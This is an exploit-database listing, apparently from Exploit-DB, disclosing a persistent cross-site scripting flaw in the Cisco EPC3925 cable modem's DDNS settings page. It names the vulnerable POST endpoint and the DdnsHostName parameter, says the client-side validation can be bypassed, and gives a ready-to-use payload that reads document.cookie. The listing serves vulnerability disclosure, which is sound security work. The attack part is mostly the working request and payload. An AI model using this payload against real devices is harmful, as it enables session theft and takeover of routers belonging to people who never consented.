header-logo
Suggest Exploit
vendor:
EPC3925
by:
Jeroen - IT Nerdbox
N/A
CVSS
N/A
Persistent Cross Site Scripting
Unknown
CWE
Product Name: EPC3925
Affected Version From: epc3925-E10-5-v302r125572-130520c
Affected Version To: epc3925-E10-5-v302r125572-130520c
Patch Exists: NO
Related CWE:
CPE: cpe:2.3:h:cisco:epc3925:epc3925-E10-5-v302r125572-130520c:*:*:*:*:*:*:*
Metasploit:
Other Scripts:
Platforms Tested: Cisco EPC3925
2013

Cisco EPC3925 – Persistent Cross Site Scripting

The parameter DdnsHostName is vulnerable to Persistent Cross Site Scripting. However, there is client side input validation, which can easily be bypassed.

Mitigation:

Unknown
Source

Exploit-DB raw data:

#######################################################################

# Exploit Title: Cisco EPC3925 - Persistent Cross Site Scripting 

# Google Dork: N/A 

# Date: 12-11-2013 

# Exploit Author: Jeroen - IT Nerdbox 

# Vendor Homepage: http://www.cisco.com 

# Software Link: Not public 

# Version: epc3925-E10-5-v302r125572-130520c 

# Tested on: Cisco EPC3925 

# CVE: N/A

#######################################################################

# Description

# The parameter DdnsHostName is vulnerable to Persistent Cross Site Scripting. 

# However, there is client side input validation, which can easily be bypassed.

#

# Location:

#

# POST http://[target]/goform/Setup_DDNS 

# 

# Parameters:

#

#DdnsService=0&DdnsUserName=xxx&DdnsPassword=****&DdnsHostName=<Enter Payload Here>&save=Save+Settings 

# 

# Payload 

# 

# PoC: "><input onmouseover=prompt(document.cookie)>

#

# Check out the video at: http://www.nerdbox.it/cisco-epc3925-persistent-xss/